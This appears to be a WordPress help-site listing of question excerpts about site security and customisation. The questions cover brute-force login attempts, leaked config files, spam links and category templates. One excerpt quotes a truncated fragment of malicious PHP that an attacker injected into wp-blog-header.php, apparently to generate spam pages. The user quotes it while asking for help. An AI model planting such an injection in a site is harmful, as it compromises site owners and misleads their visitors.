Articles of hacks

How do I specify more than one category?

I am excluding comments from specific categories. However, when I try to exclude more than one, it doesn’t work. This works: <?php if (!in_category(‘7’)) comments_template(); ?> This does not work: <?php if (!in_category(‘7 , 9’)) comments_template(); ?> or <?php if (!in_category(‘7’)) comments_template(); ?> <?php if (!in_category(‘9’)) comments_template(); ?>

If hacker looked into all php file, can he make a harm to me?

for example, i had all ftp content (wordpress instalation php files) backup, and hacker got that backup file and looked into all php files(including config.php and etc) … can he somehow access my wordpress site? remote database is disabled..

Why was my blog post inserted lot's of ad links by others?

I found that my blog posts are inserted lot’s of ad links, I’m using WordPress 2.9.2, is there a known security vulnerability in it? A screenshot : I post some codes on my blog, the ad links are inserted into them. I delete them by hand several days ago, and I found that they’re back […]

Attach to wp-login.php and xmlrpc.php

I am receiving many requests to my wp-login.php and xmlrpc file, now I just set up an htaccess to prevent requests to xmlrpc, but how do you suggest me to block wp-login? thanks

How to prevent bot or someone to modify any file automatically?

Someone modifying daily our website file wp-blog-header.php. They are adding below code which generates unneceassy pages automatic in our website, Code is : $e = pathinfo($f = strtok($p = @$_SERVER[“REQUEST_URI”], “?”), PATHINFO_EXTENSION); if ((!$e || in_array($e, array(“html”, “jpg”, “png”, “gif”)) || basename($f, “.php”) == “index”) && in_array(strtok(“=”), array(“”, “p”, “page_id”)) && (empty($_SERVER[“HTTP_USER_AGENT”]) || (stripos($u = […]

WordPress login urls

Recently we’ve notice allot of brute force attacks on our website. To make things more secure we decided to limit the access to the wp-login url to only a few , trusted IP addresses. <Files wp-login.php> order deny,allow Deny from all allow from {IP-ADDRESS} </Files> This works, and only allowed IPs are able to access […]

Hacking TinyMCE for better usability (shortcodes and html)

I’m looking for some theme or plugin examples that showcase ways in which to enhance the usability of editing shortcodes and/or custom html objects that have been inserted into the editor. I know that its possible to apply runtime styles to elements (nextpage and image rollovers are a couple examples) and I’m looking for some […]

Explanation of this hacked code

Hi I found some new code in the wp-config.php file of one of my sites, it seems to have been placed there by a hacker, anyone can explain what it does? http://pastebin.com/fdMJCAXw

Posts in multiple Categories different single.php

I am smashing my head against some code. Here is the situation: I have one post in 3 different categories, this post has to be visible in “category 1” with the single1.php, in “category 2” with single2.php and in “category 3” with single3.php. Obviously the 3 single.php pages have a different template inside. For example […]

Brute force attack?

I’m seeing this quite often: No OS, same Browser, weird hostname — they’re definitely not real users. Can I do anything to take precautions before they do something? Thanks!